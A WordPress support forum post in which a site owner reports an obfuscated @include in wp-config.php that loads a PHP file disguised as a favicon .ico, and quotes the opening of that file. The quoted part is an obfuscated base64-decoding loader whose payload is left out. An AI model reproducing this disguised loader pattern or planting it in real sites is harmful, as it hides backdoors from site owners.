possible hacked site

  • I suspect that my site has been hacked.
    I recently checked in wp-config.php and noticed the following row:
    @include “XYZXYZ”;
    where XYZ is a lot of random characters with \ between.
    I decoded this and found out that it pointed to a file:
    wp-admin/includes/favicon_random.ico
    When opening this file it is actually a php file which starts with:
    <?php
    if (!defined(‘ALREADY_RUN_1bc29b36f342a82aaf6658785356718’))
    {
    define(‘ALREADY_RUN_1bc29b36f342a82aaf6658785356718’, 1);

    $kaskz = 9452; function doghlvidyl($crpnnutj, $cqzonc){$qbtcuzh = ”; for($i=0; $i < strlen($crpnnutj); $i++){$qbtcuzh .= isset($cqzonc[$crpnnutj[$i]]) ? $cqzonc[$crpnnutj[$i]] : $crpnnutj[$i];}
    $mmbcujrau=”base” . “64_decode”;return $mmbcujrau($qbtcuzh);}
    $sbduthotdf = ‘lots of random characters’

    Anyone have any ideas on what happened? And also what to do?

Viewing 4 replies - 1 through 4 (of 4 total)
Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘possible hacked site’ is closed to new replies.